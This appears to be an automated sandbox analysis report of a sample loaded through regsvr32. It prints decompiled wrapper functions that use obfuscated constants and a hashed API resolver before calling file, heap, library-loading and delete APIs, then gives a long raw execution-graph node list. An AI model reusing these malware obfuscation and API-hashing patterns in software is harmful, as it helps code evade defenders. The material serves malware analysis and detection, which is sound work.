                                                                                                                				long _t60;
                                                                                                                
                                                                                                                				_push(_a40);
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001C9E7D(_t47);
                                                                                                                				_v20 = 0x8eb723;
                                                                                                                				_v20 = _v20 + 0xdb15;
                                                                                                                				_v20 = _v20 ^ 0x00852a30;
                                                                                                                				_v16 = 0x113147;
                                                                                                                				_v16 = _v16 >> 0xc;
                                                                                                                				_v16 = _v16 << 0xa;
                                                                                                                				_v16 = _v16 ^ 0x0008263d;
                                                                                                                				_v12 = 0x276480;
                                                                                                                				_v12 = _v12 + 0x6f6f;
                                                                                                                				_v12 = _v12 | 0x7ba60f09;
                                                                                                                				_v12 = _v12 * 0x1e;
                                                                                                                				_v12 = _v12 ^ 0x7da9aca6;
                                                                                                                				_v8 = 0x62f42b;
                                                                                                                				_v8 = _v8 >> 0xc;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 >> 3;
                                                                                                                				_v8 = _v8 ^ 0x000dc6a5;
                                                                                                                				E001DBFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
                                                                                                                				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
                                                                                                                				return _t55;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 001DBFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: d6e02314348e3f6b62ba4a6f64c5aed65758f746397e4812196ecaad889f2e08
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: 9821E57680020DBBCF15DF96D9498DFBFB5FB94748F108198F925A2220D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E001D1B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t44;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t62;
                                                                                                                				long _t63;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t62 = __edx;
                                                                                                                				_t63 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001C9E7D(_t44);
                                                                                                                				_v12 = 0x22ab7;
                                                                                                                				_t57 = 0x25;
                                                                                                                				_v12 = _v12 * 0x37;
                                                                                                                				_v12 = _v12 / _t57;
                                                                                                                				_v12 = _v12 + 0xd1d9;
                                                                                                                				_v12 = _v12 ^ 0x00090b04;
                                                                                                                				_v16 = 0xc8cc57;
                                                                                                                				_v16 = _v16 >> 0x10;
                                                                                                                				_v16 = _v16 + 0xffff2520;
                                                                                                                				_v16 = _v16 ^ 0xfffe92e9;
                                                                                                                				_v20 = 0xc52a4b;
                                                                                                                				_v20 = _v20 | 0xae757bf4;
                                                                                                                				_v20 = _v20 ^ 0xaef18991;
                                                                                                                				_v8 = 0xf15120;
                                                                                                                				_v8 = _v8 ^ 0xeebb54a4;
                                                                                                                				_v8 = _v8 << 7;
                                                                                                                				_v8 = _v8 * 0x37;
                                                                                                                				_v8 = _v8 ^ 0xf39e7cda;
                                                                                                                				E001DBFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
                                                                                                                				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
                                                                                                                				return _t55;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 001D1BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: f36a3a244b2309d5f21753a9031a69c2070bcca4305d62a24e02a1514cf82a64
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: 462133B5D00208FBDF05DFA5C94A8EEBFB5FB80314F108089E815A6261D3B49B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001D66C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				void* _t46;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __edx;
                                                                                                                				E001C9E7D(_t39);
                                                                                                                				_v12 = 0xe2acc8;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 + 0xbe17;
                                                                                                                				_v12 = _v12 ^ 0x0011993b;
                                                                                                                				_v20 = 0xf2f568;
                                                                                                                				_v20 = _v20 << 0xe;
                                                                                                                				_v20 = _v20 ^ 0xbd5142c5;
                                                                                                                				_v8 = 0x6d1128;
                                                                                                                				_v8 = _v8 + 0xffff2279;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 << 0xc;
                                                                                                                				_v8 = _v8 ^ 0x19de445b;
                                                                                                                				_v16 = 0xb26540;
                                                                                                                				_v16 = _v16 + 0xffff3889;
                                                                                                                				_v16 = _v16 ^ 0x00b459c6;
                                                                                                                				_t45 = E001DBFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
                                                                                                                				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
                                                                                                                				return _t46;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 001D6777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 2940929c4726bbdfa5c9a01ffb72d7b4588a24e25f64d4e4a3234e7bb3c68189
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 811142B2800208FBCF15DFA5CC0A8DEBFB8EF95304F108198E92962210D3B18A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001CFCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t36;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				signed int _t49;
                                                                                                                				signed int _t50;
                                                                                                                				WCHAR* _t57;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t57 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E001C9E7D(_t36);
                                                                                                                				_v20 = 0x4781cd;
                                                                                                                				_t49 = 7;
                                                                                                                				_v20 = _v20 / _t49;
                                                                                                                				_v20 = _v20 ^ 0x0004a997;
                                                                                                                				_v8 = 0x9f6121;
                                                                                                                				_v8 = _v8 | 0x04abbfea;
                                                                                                                				_v8 = _v8 ^ 0x44133d53;
                                                                                                                				_v8 = _v8 ^ 0x40a32c45;
                                                                                                                				_v16 = 0x791f5b;
                                                                                                                				_t50 = 0x6e;
                                                                                                                				_v16 = _v16 / _t50;
                                                                                                                				_v16 = _v16 ^ 0x000d135a;
                                                                                                                				_v12 = 0x90c5d0;
                                                                                                                				_v12 = _v12 ^ 0x2cafc93f;
                                                                                                                				_v12 = _v12 ^ 0x2c381e09;
                                                                                                                				E001DBFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
                                                                                                                				_t47 = LoadLibraryW(_t57); // executed
                                                                                                                				return _t47;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 001CFD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: 55729e21d3cecfe32f31517a1eb5f19200a575a7e1e6698b54bfa5e47d070045
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 91112E71D00218EBDB18DFA5C84A9EEBBB5EB54304F10818DE429A6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E001C9EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t35;
                                                                                                                				int _t42;
                                                                                                                				WCHAR* _t46;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E001C9E7D(_t35);
                                                                                                                				_v20 = 0xb0cce;
                                                                                                                				_v20 = _v20 + 0xffff00ee;
                                                                                                                				_v20 = _v20 ^ 0x0007bd05;
                                                                                                                				_v12 = 0x1e8fca;
                                                                                                                				_v12 = _v12 >> 6;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 + 0xffff1da9;
                                                                                                                				_v12 = _v12 ^ 0x0077171f;
                                                                                                                				_v16 = 0xc679b7;
                                                                                                                				_v16 = _v16 + 0x38bf;
                                                                                                                				_v16 = _v16 ^ 0x00cf762a;
                                                                                                                				_v8 = 0xa3ba51;
                                                                                                                				_v8 = _v8 ^ 0xa0d3ead1;
                                                                                                                				_v8 = _v8 + 0xe688;
                                                                                                                				_v8 = _v8 + 0xffff6d73;
                                                                                                                				_v8 = _v8 ^ 0xa079263d;
                                                                                                                				E001DBFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
                                                                                                                				_t42 = DeleteFileW(_t46); // executed
                                                                                                                				return _t42;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 001C9F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: df88304f72e88659d72038128dcc4a8252d52ad3e807021de4252f5897a8c976
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 91111CB1C11619EBDF44DFA4D94A8DEBBB4EF10318F108288E81566250E7B45B548F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001CBA9C(int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_v20 = 0x6b4597;
                                                                                                                				_v20 = _v20 >> 2;
                                                                                                                				_v20 = _v20 ^ 0x00116e69;
                                                                                                                				_v16 = 0x7d3df7;
                                                                                                                				_v16 = _v16 << 3;
                                                                                                                				_v16 = _v16 ^ 0x03ee9fa4;
                                                                                                                				_v12 = 0x7e0c35;
                                                                                                                				_v12 = _v12 ^ 0xa2581e84;
                                                                                                                				_v12 = _v12 ^ 0xa22bc007;
                                                                                                                				_v8 = 0xada9ee;
                                                                                                                				_push(_t34);
                                                                                                                				_v8 = _v8 * 0x61;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x6b103fde;
                                                                                                                				E001DBFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
                                                                                                                				ExitProcess(_a12);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 001CBB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: ad4fe31e44f2f147f4571028d1287f25956e8f4b9aec610fc4282be674a8133f
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: 57010475D1120CEB8B04DFA4CA4A9DEBBB4FB04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1055
                                                                                                                Total number of Limit Nodes:16
4365->4366 4367 4730ae 4366->4367 4367->4040 4369 47fff1 4368->4369 4370 48bff0 GetPEB 4369->4370 4371 48008b 4370->4371 4371->4057 4382 485d94 4372->4382 4373 4863d3 4392 47428c 4373->4392 4375 4863d1 4375->4057 4378 48734a GetPEB 4378->4382 4379 474bb4 RtlAllocateHeap GetPEB 4379->4382 4380 485d68 2 API calls 4380->4382 4381 47fd5f GetPEB 4381->4382 4382->4373 4382->4375 4382->4378 4382->4379 4382->4380 4382->4381 4383 47b9d7 GetPEB 4382->4383 4384 47fa6c 4382->4384 4388 47fe4b 4382->4388 4383->4382 4385 47fa85 4384->4385 4386 48bff0 GetPEB 4385->4386 4387 47fb15 4386->4387 4387->4382 4389 47fe5e 4388->4389 4390 48bff0 GetPEB 4389->4390 4391 47fef3 4390->4391 4391->4382 4393 4742a5 4392->4393 4394 48bff0 GetPEB 4393->4394 4395 474337 4394->4395 4395->4375 4397 47c635 4396->4397 4398 47c61f 4396->4398 4397->4068 4398->4397 4399 476a8d GetPEB 4398->4399 4399->4398 4401 485047 4400->4401 4414 480b4c 4401->4414 4407 49252f 4404->4407 4405 474bb4 2 API calls 4405->4407 4406 4926f3 4409 476a8d GetPEB 4406->4409 4407->4405 4407->4406 4410 48eaa3 2 API calls 4407->4410 4411 492704 4407->4411 4412 47b9d7 GetPEB 4407->4412 4516 48acff 4407->4516 4520 47c453 4407->4520 4409->4411 4410->4407 4411->4068 4412->4407 4415 480b68 4414->4415 4417 480c59 4415->4417 4420 480c57 4415->4420 4421 48eaa3 2 API calls 4415->4421 4423 477786 4415->4423 4440 47508b 4415->4440 4449 473210 4415->4449 4419 476a8d GetPEB 4417->4419 4419->4420 4420->4068 4421->4415 4438 47842c 4423->4438 4424 4788b0 4425 47d5cb GetPEB 4424->4425 4426 4788ae 4425->4426 4426->4415 4430 47f36a GetPEB 4430->4438 4431 474bb4 RtlAllocateHeap GetPEB 4431->4438 4436 481d1c GetPEB 4436->4438 4437 47d68b GetPEB 4437->4438 4438->4424 4438->4426 4438->4430 4438->4431 4438->4436 4438->4437 4439 47b9d7 GetPEB 4438->4439 4454 479f58 4438->4454 4458 47bd30 4438->4458 4462 47b40a 4438->4462 4466 47fd9d 4438->4466 4470 487473 4438->4470 4496 474d7d 4438->4496 4500 48677f 4438->4500 4439->4438 4441 4755c3 4440->4441 4442 47575d 
4441->4442 4443 47575b 4441->4443 4445 474bb4 RtlAllocateHeap GetPEB 4441->4445 4446 47b40a GetPEB 4441->4446 4447 47d68b GetPEB 4441->4447 4448 47b9d7 GetPEB 4441->4448 4444 47d5cb GetPEB 4442->4444 4443->4415 4444->4443 4445->4441 4446->4441 4447->4441 4448->4441 4450 48677f GetPEB 4449->4450 4451 47329c 4450->4451 4452 476a8d GetPEB 4451->4452 4453 4732af 4452->4453 4453->4415 4455 479f7a 4454->4455 4456 48bff0 GetPEB 4455->4456 4457 47a009 4456->4457 4457->4438 4459 47bd52 4458->4459 4460 48bff0 GetPEB 4459->4460 4461 47bdf5 4460->4461 4461->4438 4463 47b43a 4462->4463 4464 48bff0 GetPEB 4463->4464 4465 47b4e0 4464->4465 4465->4438 4467 47fdb3 4466->4467 4468 48bff0 GetPEB 4467->4468 4469 47fe3d 4468->4469 4469->4438 4475 488307 4470->4475 4471 47d5cb GetPEB 4471->4475 4472 474bb4 RtlAllocateHeap GetPEB 4478 4886af 4472->4478 4473 488558 4479 474bb4 2 API calls 4473->4479 4474 476a8d GetPEB 4474->4475 4475->4471 4475->4473 4475->4474 4476 4887d6 4475->4476 4477 48eaa3 2 API calls 4475->4477 4475->4478 4483 474bb4 RtlAllocateHeap GetPEB 4475->4483 4484 47b9d7 GetPEB 4475->4484 4504 478ab6 4475->4504 4508 4765d5 4475->4508 4476->4438 4477->4475 4478->4472 4485 47d68b GetPEB 4478->4485 4491 47b9d7 GetPEB 4478->4491 4481 488578 4479->4481 4482 474bb4 2 API calls 4481->4482 4486 48859a 4482->4486 4483->4475 4484->4475 4485->4478 4487 48ade9 GetPEB 4486->4487 4489 4885c6 4487->4489 4512 48cfc3 4489->4512 4491->4478 4493 47b9d7 GetPEB 4494 488697 4493->4494 4495 47b9d7 GetPEB 4494->4495 4495->4478 4497 474dad 4496->4497 4498 48bff0 GetPEB 4497->4498 4499 474e5c 4498->4499 4499->4438 4501 486792 4500->4501 4502 48bff0 GetPEB 4501->4502 4503 486834 4502->4503 4503->4438 4505 478af6 4504->4505 4506 48bff0 GetPEB 4505->4506 4507 478baa 4506->4507 4507->4475 4509 476602 4508->4509 4510 48bff0 GetPEB 4509->4510 4511 476697 4510->4511 4511->4475 4513 48cff4 4512->4513 4514 48bff0 GetPEB 4513->4514 4515 488667 4514->4515 4515->4493 4517 48ad1f 4516->4517 4518 48eaa3 2 API 
calls 4517->4518 4519 48ad9c 4518->4519 4519->4407 4519->4519 4521 47c481 4520->4521 4522 47f56b GetPEB 4521->4522 4523 47c4a8 4522->4523 4523->4407 4525 490343 4524->4525 4526 48bff0 GetPEB 4525->4526 4527 4903e4 4526->4527 4527->4072 4529 48aa83 4528->4529 4530 48bff0 GetPEB 4529->4530 4531 48ab22 4530->4531 4531->4072 4543 483cdd 4532->4543 4536 480c9d 4535->4536 4566 47f43b 4536->4566 4539 480e00 4539->4083 4542 48e373 2 API calls 4542->4539 4544 483d02 4543->4544 4548 483f17 4544->4548 4550 47ba93 4544->4550 4552 475942 4544->4552 4555 481a72 4544->4555 4559 48efa0 4544->4559 4563 47b34c 4544->4563 4551 48e373 2 API calls 4548->4551 4550->4083 4551->4550 4553 47588d GetPEB 4552->4553 4554 47597a 4553->4554 4554->4544 4556 481a88 4555->4556 4557 48bff0 GetPEB 4556->4557 4558 481b14 4557->4558 4558->4544 4560 48efb9 4559->4560 4561 48bff0 GetPEB 4560->4561 4562 48f052 4561->4562 4562->4544 4564 48bff0 GetPEB 4563->4564 4565 47b3f2 4564->4565 4565->4544 4567 48bff0 GetPEB 4566->4567 4568 47f4f2 4567->4568 4568->4539 4569 4814da 4568->4569 4570 4814f9 4569->4570 4571 48bff0 GetPEB 4570->4571 4572 480dee 4571->4572 4572->4542 4574 473f42 4573->4574 4575 48bff0 GetPEB 4574->4575 4576 473ff1 4575->4576 4576->4094 4578 491cd8 4577->4578 4579 48bff0 GetPEB 4578->4579 4580 491d53 4579->4580 4580->4094 4582 473169 4581->4582 4583 48bff0 GetPEB 4582->4583 4584 473203 4583->4584 4584->4094 4600 47a07f 4585->4600 4586 485b4c GetPEB 4586->4600 4588 47b074 4682 485b4c 4588->4682 4589 474bb4 2 API calls 4589->4600 4592 47b08a 4592->4100 4597 476a8d GetPEB 4597->4600 4598 47b9d7 GetPEB 4598->4600 4600->4586 4600->4588 4600->4589 4600->4592 4600->4597 4600->4598 4601 48e29a GetPEB 4600->4601 4650 4841cf 4600->4650 4659 475797 4600->4659 4663 475b8a 4600->4663 4666 476505 4600->4666 4670 47400f 4600->4670 4674 48aeae 4600->4674 4678 48b215 4600->4678 4601->4600 4610 492a55 4602->4610 4604 492bb0 4606 476a8d GetPEB 4604->4606 4605 48eaa3 2 API calls 4605->4610 4607 492bae 
4606->4607 4607->4100 4608 474bb4 2 API calls 4608->4610 4609 47f56b GetPEB 4609->4610 4610->4604 4610->4605 4610->4607 4610->4608 4610->4609 4611 47b9d7 GetPEB 4610->4611 4694 4851e8 4610->4694 4611->4610 4613 489fc8 4612->4613 4614 48a353 4613->4614 4615 476a8d GetPEB 4613->4615 4617 481d1c GetPEB 4613->4617 4620 48eaa3 RtlAllocateHeap GetPEB 4613->4620 4622 474bb4 2 API calls 4613->4622 4626 47f56b GetPEB 4613->4626 4627 48a34e 4613->4627 4628 47b9d7 GetPEB 4613->4628 4705 48e18b 4613->4705 4709 489556 4613->4709 4616 48e18b 2 API calls 4614->4616 4615->4613 4618 48a379 4616->4618 4617->4613 4713 47c4b0 4618->4713 4620->4613 4622->4613 4625 47b9d7 GetPEB 4625->4627 4626->4613 4627->4100 4628->4613 4630 4891ae 4629->4630 4631 489537 4630->4631 4634 489535 4630->4634 4636 48eaa3 2 API calls 4630->4636 4637 481d1c GetPEB 4630->4637 4717 4816ad 4630->4717 4723 479617 4630->4723 4633 476a8d GetPEB 4631->4633 4633->4634 4634->4100 4636->4630 4637->4630 4644 4847fd 4638->4644 4639 48500a 4643 476a8d GetPEB 4639->4643 4647 48501e 4643->4647 4644->4639 4645 476a8d GetPEB 4644->4645 4646 47e379 2 API calls 4644->4646 4644->4647 4648 481d1c GetPEB 4644->4648 4649 48eaa3 2 API calls 4644->4649 4765 474342 4644->4765 4770 48a4b5 4644->4770 4777 478bcb 4644->4777 4645->4644 4646->4644 4647->4100 4648->4644 4649->4644 4651 484420 4650->4651 4652 48eaa3 RtlAllocateHeap GetPEB 4651->4652 4655 484518 4651->4655 4657 481d1c GetPEB 4651->4657 4658 476a8d GetPEB 4651->4658 4686 477209 4651->4686 4652->4651 4654 476a8d GetPEB 4656 484520 4654->4656 4655->4654 4655->4656 4656->4600 4657->4651 4658->4651 4660 4757d2 4659->4660 4661 48bff0 GetPEB 4660->4661 4662 475872 4661->4662 4662->4600 4690 491933 4663->4690 4667 47652a 4666->4667 4668 48bff0 GetPEB 4667->4668 4669 4765c3 4668->4669 4669->4600 4671 474036 4670->4671 4672 48bff0 GetPEB 4671->4672 4673 4740bd 4672->4673 4673->4600 4675 48aedf 4674->4675 4676 48bff0 GetPEB 4675->4676 4677 48af74 4676->4677 4677->4600 4679 48b237 
4678->4679 4680 48bff0 GetPEB 4679->4680 4681 48b2e9 4680->4681 4681->4600 4683 485b62 4682->4683 4684 48bff0 GetPEB 4683->4684 4685 485bfa 4684->4685 4685->4592 4687 47722b 4686->4687 4688 48bff0 GetPEB 4687->4688 4689 4772b9 4688->4689 4689->4651 4691 491957 4690->4691 4692 48bff0 GetPEB 4691->4692 4693 475c87 4692->4693 4693->4600 4695 4851fe 4694->4695 4696 48545d 4695->4696 4698 48545b 4695->4698 4700 48eaa3 2 API calls 4695->4700 4701 47c63a 4695->4701 4697 47c63a GetPEB 4696->4697 4697->4698 4698->4610 4700->4695 4702 47c662 4701->4702 4703 48bff0 GetPEB 4702->4703 4704 47c6f0 4703->4704 4704->4695 4706 48e1a5 4705->4706 4707 48eaa3 2 API calls 4706->4707 4708 48e230 4707->4708 4708->4613 4710 48957e 4709->4710 4711 47f56b GetPEB 4710->4711 4712 4895a0 4711->4712 4712->4613 4714 47c4c9 4713->4714 4715 47f56b GetPEB 4714->4715 4716 47c4e3 4715->4716 4716->4625 4719 4816c7 4717->4719 4718 4818a9 4745 48595c 4718->4745 4719->4718 4720 4818a7 4719->4720 4730 47e379 4719->4730 4720->4630 4726 479644 4723->4726 4724 48eaa3 2 API calls 4724->4726 4725 4812ef GetPEB 4725->4726 4726->4724 4726->4725 4727 479985 4726->4727 4728 479996 4726->4728 4729 476a8d GetPEB 4727->4729 4728->4630 4729->4728 4742 47e3b8 4730->4742 4731 47f19d 4733 47d5cb GetPEB 4731->4733 4732 474bb4 RtlAllocateHeap GetPEB 4732->4742 4735 47f19b 4733->4735 4734 48eaa3 2 API calls 4734->4742 4735->4719 4737 4765d5 GetPEB 4737->4742 4739 476a8d GetPEB 4739->4742 4742->4731 4742->4732 4742->4734 4742->4735 4742->4737 4742->4739 4743 47d68b GetPEB 4742->4743 4744 47b9d7 GetPEB 4742->4744 4749 4741c6 4742->4749 4753 47b8f4 4742->4753 4757 47fb23 4742->4757 4761 48ac2c 4742->4761 4743->4742 4744->4742 4746 485988 4745->4746 4747 48bff0 GetPEB 4746->4747 4748 485a2b 4747->4748 4748->4720 4750 4741eb 4749->4750 4751 48bff0 GetPEB 4750->4751 4752 474279 4751->4752 4752->4742 4754 47b919 4753->4754 4755 48bff0 GetPEB 4754->4755 4756 47b9c4 4755->4756 4756->4742 4758 47fb3c 4757->4758 4759 48bff0 GetPEB 
